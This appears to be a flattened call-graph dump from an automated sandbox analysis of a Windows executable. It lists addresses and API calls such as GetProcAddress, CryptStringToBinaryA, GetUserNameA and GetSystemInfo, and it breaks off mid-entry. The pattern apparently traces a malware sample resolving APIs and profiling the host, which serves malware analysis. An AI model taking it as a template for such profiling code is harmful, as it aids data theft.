API calls 18316->18317 18318 402b37 18317->18318 18319 403810 2 API calls 18318->18319 18320 402b49 18319->18320 18321 403810 2 API calls 18320->18321 18322 402b5b 18321->18322 18323 403810 2 API calls 18322->18323 18324 402b6d 18323->18324 18325 403810 2 API calls 18324->18325 18326 402b7f 18325->18326 18327 403810 2 API calls 18326->18327 18328 402b91 18327->18328 18329 403810 2 API calls 18328->18329 18330 402ba3 18329->18330 18331 403810 2 API calls 18330->18331 18332 402bb5 18331->18332 18333 403810 2 API calls 18332->18333 18334 402bc7 18333->18334 18335 403810 2 API calls 18334->18335 18336 402bd9 18335->18336 18337 403810 2 API calls 18336->18337 18338 402beb 18337->18338 18339 403810 2 API calls 18338->18339 18340 402bfd 18339->18340 18341 403810 2 API calls 18340->18341 18342 402c0f 18341->18342 18343 403810 2 API calls 18342->18343 18344 402c21 18343->18344 18345 403810 2 API calls 18344->18345 18346 402c33 18345->18346 18347 403810 2 API calls 18346->18347 18348 402c45 18347->18348 18349 403810 2 API calls 18348->18349 18350 402c57 18349->18350 18351 403810 2 API calls 18350->18351 18352 402c69 18351->18352 18353 403810 2 API calls 18352->18353 18354 402c7b 18353->18354 18355 403810 2 API calls 18354->18355 18356 402c8d 18355->18356 18357 403810 2 API calls 18356->18357 18358 402c9f 18357->18358 18359 403810 2 API calls 18358->18359 18360 402cb1 18359->18360 18361 403810 2 API calls 18360->18361 18362 402cc3 18361->18362 18363 403810 2 API calls 18362->18363 18364 402cd5 18363->18364 18365 403810 2 API calls 18364->18365 18366 402ce7 18365->18366 18367 403810 2 API calls 18366->18367 18368 402cf9 18367->18368 18369 403810 2 API calls 18368->18369 18370 402d0b 18369->18370 18371 403810 2 API calls 18370->18371 18372 402d1d 18371->18372 18373 403810 2 API calls 18372->18373 18374 402d2f 18373->18374 18375 403810 2 API calls 18374->18375 18376 402d41 18375->18376 18377 403810 2 API calls 18376->18377 18378 402d53 18377->18378 18379 403810 2 API calls 18378->18379 18380 402d65 18379->18380 18381 403810 2 API calls 18380->18381 18382 402d77 18381->18382 18383 403810 2 API calls 18382->18383 18384 402d89 18383->18384 18385 403810 2 API calls 18384->18385 18386 402d9b 18385->18386 18387 403810 2 API calls 18386->18387 18388 402dad 18387->18388 18389 403810 2 API calls 18388->18389 18390 402dbf 18389->18390 18391 403810 2 API calls 18390->18391 18392 402dd1 18391->18392 18393 403810 2 API calls 18392->18393 18394 402de3 18393->18394 18395 403810 2 API calls 18394->18395 18396 402df5 18395->18396 18397 403810 2 API calls 18396->18397 18398 402e07 18397->18398 18399 403810 2 API calls 18398->18399 18400 402e19 18399->18400 18401 403810 2 API calls 18400->18401 18402 402e2b 18401->18402 18403 403810 2 API calls 18402->18403 18404 402e3d 18403->18404 18405 403810 2 API calls 18404->18405 18406 402e4f 18405->18406 18407 403810 2 API calls 18406->18407 18408 402e61 18407->18408 18409 403810 2 API calls 18408->18409 18410 402e73 18409->18410 18411 403810 2 API calls 18410->18411 18412 402e85 18411->18412 18413 403810 2 API calls 18412->18413 18414 402e97 18413->18414 18415 403810 2 API calls 18414->18415 18416 402ea9 18415->18416 18417 403810 2 API calls 18416->18417 18418 402ebb 18417->18418 18419 403810 2 API calls 18418->18419 18420 402ecd 18419->18420 18421 403810 2 API calls 18420->18421 18422 402edf 18421->18422 18423 403810 2 API calls 18422->18423 18424 402ef1 18423->18424 18425 403810 2 API calls 18424->18425 18426 402f03 18425->18426 18427 403810 2 API calls 18426->18427 18428 402f15 18427->18428 18429 403810 2 API calls 18428->18429 18430 402f27 18429->18430 18431 403810 2 API calls 18430->18431 18432 402f39 18431->18432 18433 403810 2 API calls 18432->18433 18434 402f4b 18433->18434 18435 403810 2 API calls 18434->18435 18436 402f5d 18435->18436 18437 403810 2 API calls 18436->18437 18438 402f6f 18437->18438 18439 403810 2 API calls 18438->18439 18440 402f81 18439->18440 18441 403810 2 API calls 18440->18441 18442 402f93 18441->18442 18443 403810 2 API calls 18442->18443 18444 402fa5 18443->18444 18445 403810 2 API calls 18444->18445 18446 402fb7 18445->18446 18447 403810 2 API calls 18446->18447 18448 402fc9 18447->18448 18449 403810 2 API calls 18448->18449 18450 402fdb 18449->18450 18451 403810 2 API calls 18450->18451 18452 402fed 18451->18452 18453 403810 2 API calls 18452->18453 18454 402fff 18453->18454 18455 403810 2 API calls 18454->18455 18456 403011 18455->18456 18457 403810 2 API calls 18456->18457 18458 403023 18457->18458 18459 403810 2 API calls 18458->18459 18460 403035 18459->18460 18461 403810 2 API calls 18460->18461 18462 403047 18461->18462 18463 403810 2 API calls 18462->18463 18464 403059 18463->18464 18465 403810 2 API calls 18464->18465 18466 40306b 18465->18466 18467 403810 2 API calls 18466->18467 18468 40307d 18467->18468 18469 403810 2 API calls 18468->18469 18470 40308f 18469->18470 18471 403810 2 API calls 18470->18471 18472 4030a1 18471->18472 18473 403810 2 API calls 18472->18473 18474 4030b3 18473->18474 18475 403810 2 API calls 18474->18475 18476 4030c5 18475->18476 18477 403810 2 API calls 18476->18477 18478 4030d7 18477->18478 18479 403810 2 API calls 18478->18479 18480 4030e9 18479->18480 18481 403810 2 API calls 18480->18481 18482 4030fb 18481->18482 18483 403810 2 API calls 18482->18483 18484 40310d 18483->18484 18485 403810 2 API calls 18484->18485 18486 40311f 18485->18486 18487 403810 2 API calls 18486->18487 18488 403131 18487->18488 18489 403810 2 API calls 18488->18489 18490 403143 18489->18490 18491 403810 2 API calls 18490->18491 18492 403155 18491->18492 18493 403810 2 API calls 18492->18493 18494 403167 18493->18494 18495 403810 2 API calls 18494->18495 18496 403179 18495->18496 18497 403810 2 API calls 18496->18497 18498 40318b 18497->18498 18499 403810 2 API calls 18498->18499 18500 40319d 18499->18500 18501 403810 2 API calls 18500->18501 18502 4031af 18501->18502 18503 403810 2 API calls 18502->18503 18504 4031c1 18503->18504 18505 403810 2 API calls 18504->18505 18506 4031d3 18505->18506 18507 403810 2 API calls 18506->18507 18508 4031e5 18507->18508 18509 403810 2 API calls 18508->18509 18510 4031f7 18509->18510 18511 403810 2 API calls 18510->18511 18512 403209 18511->18512 18513 403810 2 API calls 18512->18513 18514 40321b 18513->18514 18515 403810 2 API calls 18514->18515 18516 40322d 18515->18516 18517 403810 2 API calls 18516->18517 18518 40323f 18517->18518 18519 403810 2 API calls 18518->18519 18520 403251 18519->18520 18521 403810 2 API calls 18520->18521 18522 403263 18521->18522 18523 403810 2 API calls 18522->18523 18524 403275 18523->18524 18525 403810 2 API calls 18524->18525 18526 403287 18525->18526 18527 403810 2 API calls 18526->18527 18528 403299 18527->18528 18529 403810 2 API calls 18528->18529 18530 4032ab 18529->18530 18531 403810 2 API calls 18530->18531 18532 4032bd 18531->18532 18533 403810 2 API calls 18532->18533 18534 4032cf 18533->18534 18535 403810 2 API calls 18534->18535 18536 4032e1 18535->18536 18537 403810 2 API calls 18536->18537 18538 4032f3 18537->18538 18539 403810 2 API calls 18538->18539 18540 403305 18539->18540 18541 403810 2 API calls 18540->18541 18542 403317 18541->18542 18543 403810 2 API calls 18542->18543 18544 403329 18543->18544 18545 403810 2 API calls 18544->18545 18546 40333b 18545->18546 18547 403810 2 API calls 18546->18547 18548 40334d 18547->18548 18549 403810 2 API calls 18548->18549 18550 40335f 18549->18550 18551 403810 2 API calls 18550->18551 18552 403371 18551->18552 18553 403810 2 API calls 18552->18553 18554 403383 18553->18554 18555 403810 2 API calls 18554->18555 18556 403395 18555->18556 18557 403810 2 API calls 18556->18557 18558 4033a7 18557->18558 18559 403810 2 API calls 18558->18559 18560 4033b9 18559->18560 18561 403810 2 API calls 18560->18561 18562 4033cb 18561->18562 18563 403810 2 API calls 18562->18563 18564 4033dd 18563->18564 18565 403810 2 API calls 18564->18565 18566 4033ef 18565->18566 18567 403810 2 API calls 18566->18567 18568 403401 18567->18568 18569 403810 2 API calls 18568->18569 18570 403413 18569->18570 18571 403810 2 API calls 18570->18571 18572 403425 18571->18572 18573 403810 2 API calls 18572->18573 18574 403437 18573->18574 18575 403810 2 API calls 18574->18575 18576 403449 18575->18576 18577 403810 2 API calls 18576->18577 18578 40345b 18577->18578 18579 403810 2 API calls 18578->18579 18580 40346d 18579->18580 18581 403810 2 API calls 18580->18581 18582 40347f 18581->18582 18583 403810 2 API calls 18582->18583 18584 403491 18583->18584 18585 403810 2 API calls 18584->18585 18586 4034a3 18585->18586 18587 403810 2 API calls 18586->18587 18588 4034b5 18587->18588 18589 403810 2 API calls 18588->18589 18590 4034c7 18589->18590 18591 403810 2 API calls 18590->18591 18592 4034d9 18591->18592 18593 403810 2 API calls 18592->18593 18594 4034eb 18593->18594 18595 403810 2 API calls 18594->18595 18596 4034fd 18595->18596 18597 403810 2 API calls 18596->18597 18598 40350f 18597->18598 18599 403810 2 API calls 18598->18599 18600 403521 18599->18600 18601 403810 2 API calls 18600->18601 18602 403533 18601->18602 18603 403810 2 API calls 18602->18603 18604 403545 18603->18604 18605 403810 2 API calls 18604->18605 18606 403557 18605->18606 18607 403810 2 API calls 18606->18607 18608 403569 18607->18608 18609 403810 2 API calls 18608->18609 18610 40357b 18609->18610 18611 403810 2 API calls 18610->18611 18612 40358d 18611->18612 18613 403810 2 API calls 18612->18613 18614 40359f 18613->18614 18615 403810 2 API calls 18614->18615 18616 4035b1 18615->18616 18617 403810 2 API calls 18616->18617 18618 4035c3 18617->18618 18619 403810 2 API calls 18618->18619 18620 4035d5 18619->18620 18621 403810 2 API calls 18620->18621 18622 4035e7 18621->18622 18623 403810 2 API calls 18622->18623 18624 4035f9 18623->18624 18625 403810 2 API calls 18624->18625 18626 40360b 18625->18626 18627 403810 2 API calls 18626->18627 18628 40361d 18627->18628 18629 403810 2 API calls 18628->18629 18630 40362f 18629->18630 18631 403810 2 API calls 18630->18631 18632 403641 18631->18632 18633 403810 2 API calls 18632->18633 18634 403653 18633->18634 18635 403810 2 API calls 18634->18635 18636 403665 18635->18636 18637 403810 2 API calls 18636->18637 18638 403677 18637->18638 18639 403810 2 API calls 18638->18639 18640 403689 18639->18640 18641 403810 2 API calls 18640->18641 18642 40369b 18641->18642 18643 403810 2 API calls 18642->18643 18644 4036ad 18643->18644 18645 403810 2 API calls 18644->18645 18646 4036bf 18645->18646 18647 403810 2 API calls 18646->18647 18648 4036d1 18647->18648 18649 403810 2 API calls 18648->18649 18650 4036e3 18649->18650 18651 403810 2 API calls 18650->18651 18652 4036f5 18651->18652 18653 403810 2 API calls 18652->18653 18654 403707 18653->18654 18655 403810 2 API calls 18654->18655 18656 403719 18655->18656 18657 403810 2 API calls 18656->18657 18658 40372b 18657->18658 18659 403810 2 API calls 18658->18659 18660 40373d 18659->18660 18661 403810 2 API calls 18660->18661 18662 40374f 18661->18662 18663 403810 2 API calls 18662->18663 18664 403761 18663->18664 18665 403810 2 API calls 18664->18665 18666 403773 18665->18666 18667 403810 2 API calls 18666->18667 18668 403785 18667->18668 18669 403810 2 API calls 18668->18669 18670 403797 18669->18670 18671 403810 2 API calls 18670->18671 18672 4037a9 18671->18672 18673 403810 2 API calls 18672->18673 18674 4037bb 18673->18674 18675 403810 2 API calls 18674->18675 18676 4037cd 18675->18676 18677 403810 2 API calls 18676->18677 18678 4037df 18677->18678 18679 403810 2 API calls 18678->18679 18680 4037f1 18679->18680 18681 403810 2 API calls 18680->18681 18682 403803 18681->18682 18683 4124f0 18682->18683 18684 412500 43 API calls 18683->18684 18685 412916 8 API calls 18683->18685 18684->18685 18686 412a26 18685->18686 18687 4129ac GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18685->18687 18688 412a33 8 API calls 18686->18688 18689 412af6 18686->18689 18687->18686 18688->18689 18690 412b78 18689->18690 18691 412aff GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18689->18691 18692 412b85 6 API calls 18690->18692 18693 412c17 18690->18693 18691->18690 18692->18693 18694 412c24 9 API calls 18693->18694 18695 412cff 18693->18695 18694->18695 18696 412d82 18695->18696 18697 412d08 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18695->18697 18698 412d8b GetProcAddress GetProcAddress 18696->18698 18699 412dbc 18696->18699 18697->18696 18698->18699 18700 412df5 18699->18700 18701 412dc5 GetProcAddress GetProcAddress 18699->18701 18702 412e02 8 API calls 18700->18702 18703 412ec5 18700->18703 18701->18700 18702->18703 18704 412f2f 18703->18704 18705 412ece GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18703->18705 18706 412f51 18704->18706 18707 412f38 GetProcAddress 18704->18707 18705->18704 18708 40fab6 18706->18708 18709 412f5a GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18706->18709 18707->18706 18708->17898 18709->18708 18711 4105b5 18710->18711 18712 410669 GetProcessHeap RtlAllocateHeap 18711->18712 18713 410686 18712->18713 18715 410695 18712->18715 18714 412ff0 lstrcpy 18713->18714 18716 40fb84 18714->18716 18717 412ff0 lstrcpy 18715->18717 18716->17918 18717->18716 18719 413050 lstrcpy 18718->18719 18720 4039a9 18719->18720 19663 4038c0 18720->19663 18722 4039b5 18723 412ff0 lstrcpy 18722->18723 18724 4039e7 18723->18724 18725 412ff0 lstrcpy 18724->18725 18726 4039f4 18725->18726 18727 412ff0 lstrcpy 18726->18727 18728 403a01 18727->18728 18729 412ff0 lstrcpy 18728->18729 18730 403a0e 18729->18730 18731 412ff0 lstrcpy 18730->18731 18732 403a1b 18731->18732 18736 403f77 18732->18736 19673 4115d0 18732->19673 18734 403a73 19681 4131d0 18734->19681 19687 4061b0 CryptStringToBinaryA 18736->19687 18737 403a86 18738 413150 lstrcpy 18737->18738 18743 403a8f 18738->18743 18741 4130d0 2 API calls 18742 404015 18741->18742 18744 413260 4 API calls 18742->18744 18747 413260 4 API calls 18743->18747 18746 40402b 18744->18746 18745 404037 18750 413050 lstrcpy 18745->18750 18748 413150 lstrcpy 18746->18748 18749 403ab9 18747->18749 18748->18745 18751 413150 lstrcpy 18749->18751 18761 404067 18750->18761 18752 403ac2 18751->18752 18753 413260 4 API calls 18752->18753 18754 403ae1 18753->18754 18755 413150 lstrcpy 18754->18755 18756 403aea 18755->18756 18757 4131d0 3 API calls 18756->18757 18758 403b08 18757->18758 18759 413150 lstrcpy 18758->18759 18760 403b11 18759->18760 18762 413260 4 API calls 18760->18762 18761->17921 18763 403b30 18762->18763 18764 413150 lstrcpy 18763->18764 18765 403b39 18764->18765 18766 413260 4 API calls 18765->18766 18767 403b58 18766->18767 18768 413150 lstrcpy 18767->18768 18769 403b61 18768->18769 18770 413260 4 API calls 18769->18770 18771 403b8d 18770->18771 18772 4131d0 3 API calls 18771->18772 18773 403b94 18772->18773 18774 413150 lstrcpy 18773->18774 18775 403b9d 18774->18775 18775->18736 18776 413260 4 API calls 18775->18776 18777 403c4c 18776->18777 18778 413150 lstrcpy 18777->18778 18779 403c55 18778->18779 18780 4131d0 3 API calls 18779->18780 18781 403c73 18780->18781 18782 413150 lstrcpy 18781->18782 18783 403c7c 18782->18783 18784 413260 4 API calls 18783->18784 18785 403c9b 18784->18785 18786 413150 lstrcpy 18785->18786 18787 403ca4 18786->18787 18788 413260 4 API calls 18787->18788 18789 403cc5 18788->18789 18790 413150 lstrcpy 18789->18790 18791 403cce 18790->18791 18792 413260 4 API calls 18791->18792 18793 403cee 18792->18793 18794 413150 lstrcpy 18793->18794 18795 403cf7 18794->18795 18796 413260 4 API calls 18795->18796 18797 403d16 18796->18797 18798 413150 lstrcpy 18797->18798 18799 403d1f 18798->18799 18800 4131d0 3 API calls 18799->18800 18801 403d3d 18800->18801 18802 413150 lstrcpy 18801->18802 18803 403d46 18802->18803 18804 413260 4 API calls 18803->18804 18805 403d65 18804->18805 18806 413150 lstrcpy 18805->18806 18807 403d6e 18806->18807 18808 413260 4 API calls 18807->18808 18809 403d8d 18808->18809 18810 413150 lstrcpy 18809->18810 18811 403d96 18810->18811 18812 4131d0 3 API calls 18811->18812 18813 403db4 18812->18813 18814 413150 lstrcpy 18813->18814 18815 403dbd 18814->18815 18816 413260 4 API calls 18815->18816 18817 403ddc 18816->18817 18818 413150 lstrcpy 18817->18818 18819 403de5 18818->18819 18820 413260 4 API calls 18819->18820 18821 403e06 18820->18821 18822 413150 lstrcpy 18821->18822 18823 403e0f 18822->18823 18824 413260 4 API calls 18823->18824 18825 403e2f 18824->18825 18826 413150 lstrcpy 18825->18826 18827 403e38 18826->18827 18828 413260 4 API calls 18827->18828 18829 403e57 18828->18829 18830 413150 lstrcpy 18829->18830 18831 403e60 18830->18831 18832 4131d0 3 API calls 18831->18832 18833 403e7e 18832->18833 18834 413150 lstrcpy 18833->18834 18835 403e87 18834->18835 18836 412ff0 lstrcpy 18835->18836 18837 403ea2 18836->18837 18838 4131d0 3 API calls 18837->18838 18839 403ec3 18838->18839 18840 4131d0 3 API calls 18839->18840 18841 403eca 18840->18841 18842 413150 lstrcpy 18841->18842 18843 403ed6 18842->18843 18844 403ef7 lstrlen 18843->18844 18845 403f0a 18844->18845 18846 403f13 lstrlen 18845->18846 18847 403f23 18846->18847 18847->18736 18848 413260 4 API calls 18847->18848 18849 413150 lstrcpy 18847->18849 18848->18847 18849->18847 18851 40bcd4 18850->18851 18852 40bce7 18851->18852 18853 40bcdf ExitProcess 18851->18853 18854 40bcf7 strtok_s 18852->18854 18858 40bd04 18854->18858 18855 40be78 strtok_s 18855->18858 18856 40be9c 18856->17923 18857 4130d0 lstrlen lstrcpy 18857->18858 18858->18855 18858->18856 18858->18857 18860 413050 lstrcpy 18859->18860 18861 401963 18860->18861 18862 413050 lstrcpy 18861->18862 18863 401975 18862->18863 18864 413050 lstrcpy 18863->18864 18865 401987 18864->18865 18866 413050 lstrcpy 18865->18866 18867 401999 18866->18867 18868 404a70 18867->18868 18869 413050 lstrcpy 18868->18869 18870 404a89 18869->18870 18871 4038c0 2 API calls 18870->18871 18872 404a95 18871->18872 18873 412ff0 lstrcpy 18872->18873 18874 404aca 18873->18874 18875 412ff0 lstrcpy 18874->18875 18876 404ad7 18875->18876 18877 412ff0 lstrcpy 18876->18877 18878 404ae4 18877->18878 18879 412ff0 lstrcpy 18878->18879 18880 404af1 18879->18880 18881 412ff0 lstrcpy 18880->18881 18882 404afe 18881->18882 18883 4115d0 3 API calls 18882->18883 18885 405077 18882->18885 18884 404b4c 18883->18884 18886 4131d0 3 API calls 18884->18886 18889 4061b0 2 API calls 18885->18889 18887 404b5f 18886->18887 18888 413150 lstrcpy 18887->18888 18893 404b68 18888->18893 18890 4050f3 18889->18890 18891 4130d0 2 API calls 18890->18891 18895 40512c 18890->18895 18892 40510a 18891->18892 18894 413260 4 API calls 18892->18894 18897 413260 4 API calls 18893->18897 18896 405120 18894->18896 18900 413050 lstrcpy 18895->18900 18898 413150 lstrcpy 18896->18898 18899 404b92 18897->18899 18898->18895 18901 413150 lstrcpy 18899->18901 18910 40515c 18900->18910 18902 404b9b 18901->18902 18903 413260 4 API calls 18902->18903 18904 404bba 18903->18904 18905 413150 lstrcpy 18904->18905 18906 404bc3 18905->18906 18907 4131d0 3 API calls 18906->18907 18908 404be1 18907->18908 18909 413150 lstrcpy 18908->18909 18911 404bea 18909->18911 18910->17929 18912 413260 4 API calls 18911->18912 18913 404c09 18912->18913 18914 413150 lstrcpy 18913->18914 18915 404c12 18914->18915 18916 413260 4 API calls 18915->18916 18917 404c31 18916->18917 18918 413150 lstrcpy 18917->18918 18919 404c3a 18918->18919 18920 413260 4 API calls 18919->18920 18921 404c66 18920->18921 18922 4131d0 3 API calls 18921->18922 18923 404c6d 18922->18923 18924 413150 lstrcpy 18923->18924 18925 404c76 18924->18925 18925->18885 18926 413260 4 API calls 18925->18926 18927 404d2f 18926->18927 18928 413150 lstrcpy 18927->18928 18929 404d38 18928->18929 18930 4131d0 3 API calls 18929->18930 18931 404d56 18930->18931 18932 413150 lstrcpy 18931->18932 18933 404d5f 18932->18933 18934 413260 4 API calls 18933->18934 18935 404d7e 18934->18935 18936 413150 lstrcpy 18935->18936 18937 404d87 18936->18937 18938 413260 4 API calls 18937->18938 18939 404da8 18938->18939 18940 413150 lstrcpy 18939->18940 18941 404db1 18940->18941 18942 413260 4 API calls 18941->18942 18943 404dd1 18942->18943 18944 413150 lstrcpy 18943->18944 18945 404dda 18944->18945 18946 413260 4 API calls 18945->18946 18947 404df9 18946->18947 18948 413150 lstrcpy 18947->18948 18949 404e02 18948->18949 18950 4131d0 3 API calls 18949->18950 18951 404e20 18950->18951 18952 413150 lstrcpy 18951->18952 18953 404e29 18952->18953 18954 413260 4 API calls 18953->18954 18955 404e48 18954->18955 18956 413150 lstrcpy 18955->18956 18957 404e51 18956->18957 18958 413260 4 API calls 18957->18958 18959 404e70 18958->18959 18960 413150 lstrcpy 18959->18960 18961 404e79 18960->18961 18962 4131d0 3 API calls 18961->18962 18963 404e97 18962->18963 18964 413150 lstrcpy 18963->18964 18965 404ea0 18964->18965 18966 413260 4 API calls 18965->18966 18967 404ebf 18966->18967 18968 413150 lstrcpy 18967->18968 18969 404ec8 18968->18969 18970 413260 4 API calls 18969->18970 18971 404ee9 18970->18971 18972 413150 lstrcpy 18971->18972 18973 404ef2 18972->18973 18974 413260 4 API calls 18973->18974 18975 404f12 18974->18975 18976 413150 lstrcpy 18975->18976 18977 404f1b 18976->18977 18978 413260 4 API calls 18977->18978 18979 404f3a 18978->18979 18980 413150 lstrcpy 18979->18980 18981 404f43 18980->18981 18982 4131d0 3 API calls 18981->18982 18983 404f61 18982->18983 18984 413150 lstrcpy 18983->18984 18985 404f6a 18984->18985 18986 404f7d lstrlen 18985->18986 19694 413380 18986->19694 18988 404f8e lstrlen GetProcessHeap RtlAllocateHeap 19695 413380 18988->19695 18990 404fbb lstrlen 19696 413380 18990->19696 18992 404fcb memcpy 19697 413380 18992->19697 18994 404fe4 lstrlen 18995 404ff4 18994->18995 18996 404ffd lstrlen memcpy 18995->18996 19698 413380 18996->19698 18998 405027 lstrlen 18999 405037 18998->18999 18999->18885 19000 413260 4 API calls 18999->19000 19001 413150 lstrcpy 18999->19001 19000->18999 19001->18999 19699 413380 19002->19699 19004 40b5c7 strtok_s 19007 40b5d4 19004->19007 19005 40b6a1 19005->17931 19006 40b67d strtok_s 19006->19007 19007->19005 19007->19006 19008 4130d0 lstrlen lstrcpy 19007->19008 19008->19007 19700 413380 19009->19700 19011 40b417 strtok_s 19015 40b424 19011->19015 19012 40b577 19012->17939 19013 40b553 strtok_s 19013->19015 19014 4130d0 lstrlen lstrcpy 19014->19015 19015->19012 19015->19013 19015->19014 19017 412ff0 lstrcpy 19016->19017 19018 40bef6 19017->19018 19019 413260 4 API calls 19018->19019 19020 40bf07 19019->19020 19021 413150 lstrcpy 19020->19021 19022 40bf10 19021->19022 19023 413260 4 API calls 19022->19023 19024 40bf2b 19023->19024 19025 413150 lstrcpy 19024->19025 19026 40bf34 19025->19026 19027 413260 4 API calls 19026->19027 19028 40bf4d 19027->19028 19029 413150 lstrcpy 19028->19029 19030 40bf56 19029->19030 19031 413260 4 API calls 19030->19031 19032 40bf71 19031->19032 19033 413150 lstrcpy 19032->19033 19034 40bf7a 19033->19034 19035 413260 4 API calls 19034->19035 19036 40bf93 19035->19036 19037 413150 lstrcpy 19036->19037 19038 40bf9c 19037->19038 19039 413260 4 API calls 19038->19039 19040 40bfb7 19039->19040 19041 413150 lstrcpy 19040->19041 19042 40bfc0 19041->19042 19043 413260 4 API calls 19042->19043 19044 40bfd9 19043->19044 19045 413150 lstrcpy 19044->19045 19046 40bfe2 19045->19046 19047 413260 4 API calls 19046->19047 19048 40bffd 19047->19048 19049 413150 lstrcpy 19048->19049 19050 40c006 19049->19050 19051 413260 4 API calls 19050->19051 19052 40c01f 19051->19052 19053 413150 lstrcpy 19052->19053 19054 40c028 19053->19054 19055 413260 4 API calls 19054->19055 19056 40c046 19055->19056 19057 413150 lstrcpy 19056->19057 19058 40c04f 19057->19058 19059 410590 3 API calls 19058->19059 19060 40c066 19059->19060 19061 4131d0 3 API calls 19060->19061 19062 40c079 19061->19062 19063 413150 lstrcpy 19062->19063 19064 40c082 19063->19064 19065 413260 4 API calls 19064->19065 19066 40c0ac 19065->19066 19067 413150 lstrcpy 19066->19067 19068 40c0b5 19067->19068 19069 413260 4 API calls 19068->19069 19070 40c0d5 19069->19070 19071 413150 lstrcpy 19070->19071 19072 40c0de 19071->19072 19701 4106d0 GetProcessHeap RtlAllocateHeap 19072->19701 19075 413260 4 API calls 19076 40c0fe 19075->19076 19077 413150 lstrcpy 19076->19077 19078 40c107 19077->19078 19079 413260 4 API calls 19078->19079 19080 40c126 19079->19080 19081 413150 lstrcpy 19080->19081 19082 40c12f 19081->19082 19083 413260 4 API calls 19082->19083 19084 40c150 19083->19084 19085 413150 lstrcpy 19084->19085 19086 40c159 19085->19086 19703 410750 GetCurrentProcess 19086->19703 19089 413260 4 API calls 19090 40c179 19089->19090 19091 413150 lstrcpy 19090->19091 19092 40c182 19091->19092 19093 413260 4 API calls 19092->19093 19094 40c1a1 19093->19094 19095 413150 lstrcpy 19094->19095 19096 40c1aa 19095->19096 19097 413260 4 API calls 19096->19097 19098 40c1cb 19097->19098 19099 413150 lstrcpy 19098->19099 19100 40c1d4 19099->19100 19705 410790 GetProcessHeap RtlAllocateHeap GetUserNameA 19100->19705 19102 40c1e4 19103 413260 4 API calls 19102->19103 19104 40c1f4 19103->19104 19105 413150 lstrcpy 19104->19105 19106 40c1fd 19105->19106 19107 413260 4 API calls 19106->19107 19108 40c21c 19107->19108 19109 413150 lstrcpy 19108->19109 19110 40c225 19109->19110 19111 413260 4 API calls 19110->19111 19112 40c245 19111->19112 19113 413150 lstrcpy 19112->19113 19114 40c24e 19113->19114 19115 4107d0 3 API calls 19114->19115 19116 40c25e 19115->19116 19117 413260 4 API calls 19116->19117 19118 40c26e 19117->19118 19119 413150 lstrcpy 19118->19119 19120 40c277 19119->19120 19121 413260 4 API calls 19120->19121 19122 40c296 19121->19122 19123 413150 lstrcpy 19122->19123 19124 40c29f 19123->19124 19125 413260 4 API calls 19124->19125 19126 40c2c0 19125->19126 19127 413150 lstrcpy 19126->19127 19128 40c2c9 19127->19128 19706 410820 GetProcessHeap RtlAllocateHeap 19128->19706 19131 413260 4 API calls 19132 40c2e9 19131->19132 19133 413150 lstrcpy 19132->19133 19134 40c2f2 19133->19134 19135 413260 4 API calls 19134->19135 19136 40c311 19135->19136 19137 413150 lstrcpy 19136->19137 19138 40c31a 19137->19138 19139 413260 4 API calls 19138->19139 19140 40c33b 19139->19140 19141 413150 lstrcpy 19140->19141 19142 40c344 19141->19142 19708 410880 GetProcessHeap RtlAllocateHeap 19142->19708 19145 413260 4 API calls 19146 40c364 19145->19146 19147 413150 lstrcpy 19146->19147 19148 40c36d 19147->19148 19149 413260 4 API calls 19148->19149 19150 40c38c 19149->19150 19151 413150 lstrcpy 19150->19151 19152 40c395 19151->19152 19153 413260 4 API calls 19152->19153 19154 40c3b5 19153->19154 19155 413150 lstrcpy 19154->19155 19156 40c3be 19155->19156 19157 413260 4 API calls 19156->19157 19158 40c3de 19157->19158 19159 413150 lstrcpy 19158->19159 19160 40c3e7 19159->19160 19161 413260 4 API calls 19160->19161 19162 40c406 19161->19162 19163 413150 lstrcpy 19162->19163 19164 40c40f 19163->19164 19165 413260 4 API calls 19164->19165 19166 40c430 19165->19166 19167 413150 lstrcpy 19166->19167 19168 40c439 19167->19168 19710 410940 19168->19710 19170 40c450 19171 4131d0 3 API calls 19170->19171 19172 40c463 19171->19172 19173 413150 lstrcpy 19172->19173 19174 40c46c 19173->19174 19175 413260 4 API calls 19174->19175 19176 40c496 19175->19176 19177 413150 lstrcpy 19176->19177 19178 40c49f 19177->19178 19179 413260 4 API calls 19178->19179 19180 40c4bf 19179->19180 19181 413150 lstrcpy 19180->19181 19182 40c4c8 19181->19182 19183 413260 4 API calls 19182->19183 19184 40c4e8 19183->19184 19185 413150 lstrcpy 19184->19185 19186 40c4f1 19185->19186 19187 413260 4 API calls 19186->19187 19188 40c510 19187->19188 19189 413150 lstrcpy 19188->19189 19190 40c519 19189->19190 19191 413260 4 API calls 19190->19191 19192 40c53a 19191->19192 19193 413150 lstrcpy 19192->19193 19194 40c543 19193->19194 19718 411ee0 19194->19718 19197 4131d0 3 API calls 19198 40c574 19197->19198 19199 413150 lstrcpy 19198->19199 19200 40c57d 19199->19200 19201 413260 4 API calls 19200->19201 19202 40c5a7 19201->19202 19203 413150 lstrcpy 19202->19203 19204 40c5b0 19203->19204 19205 413260 4 API calls 19204->19205 19206 40c5d0 19205->19206 19207 413150 lstrcpy 19206->19207 19208 40c5d9 19207->19208 19724 410b10 GetProcessHeap RtlAllocateHeap 19208->19724 19211 413260 4 API calls 19212 40c5f9 19211->19212 19213 413150 lstrcpy 19212->19213 19214 40c602 19213->19214 19215 413260 4 API calls 19214->19215 19216 40c621 19215->19216 19217 413150 lstrcpy 19216->19217 19218 40c62a 19217->19218 19219 413260 4 API calls 19218->19219 19220 40c64b 19219->19220 19221 413150 lstrcpy 19220->19221 19222 40c654 19221->19222 19726 410bd0 19222->19726 19225 413260 4 API calls 19226 40c674 19225->19226 19227 413150 lstrcpy 19226->19227 19228 40c67d 19227->19228 19229 413260 4 API calls 19228->19229 19230 40c69c 19229->19230 19231 413150 lstrcpy 19230->19231 19232 40c6a5 19231->19232 19233 413260 4 API calls 19232->19233 19234 40c6c6 19233->19234 19235 413150 lstrcpy 19234->19235 19236 40c6cf 19235->19236 19735 410b90 GetSystemInfo 19236->19735 19239 413260 4 API calls 19240 40c6ef 19239->19240 19241 413150 lstrcpy 19240->19241 19242 40c6f8 19241->19242 19243 413260 4 API calls 19242->19243 19244 40c717 19243->19244 19245 413150 lstrcpy 19244->19245 19246 40c720 19245->19246 19247 413260 4 API calls 19246->19247 19248 